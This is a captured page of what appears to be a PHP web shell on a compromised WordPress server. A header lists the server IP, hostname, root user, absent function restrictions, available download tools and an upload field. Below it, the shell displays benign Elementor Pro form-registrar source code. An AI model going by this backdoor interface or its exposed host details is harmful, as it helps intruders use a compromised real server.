Server IP : 209.38.156.173 / Your IP : 216.73.216.122 [ Web Server : Apache/2.4.52 (Ubuntu) System : Linux lakekumayuhotel 5.15.0-136-generic #147-Ubuntu SMP Sat Mar 15 15:53:30 UTC 2025 x86_64 User : root ( 0) PHP Version : 8.1.2-1ubuntu2.22 Disable Function : NONE Domains : 2 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/html/wp-content/plugins/elementor-pro/modules/forms/registrars/ |
Upload File : |
<?php namespace ElementorPro\Modules\Forms\Registrars; use ElementorPro\Core\Utils\Registrar; use ElementorPro\Modules\Forms\Fields; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } /** * Basic form fields registration manager. */ class Form_Fields_Registrar extends Registrar { /** * Form_Fields_Registrar constructor. * * @return void */ public function __construct() { parent::__construct(); $this->init(); } /** * Initialize the default fields. * * @return void */ public function init() { $this->register( new Fields\Time() ); $this->register( new Fields\Date() ); $this->register( new Fields\Tel() ); $this->register( new Fields\Number() ); $this->register( new Fields\Acceptance() ); $this->register( new Fields\Upload() ); $this->register( new Fields\Step() ); /** * Elementor Pro form fields registration. * * Fires when a new form field is registered. This hook allows developers to * register new form fields. * * @since 3.5.0 * * @param Form_Actions_Registrar $this An instance of form fields registration * manager. */ do_action( 'elementor_pro/forms/fields/register', $this ); } }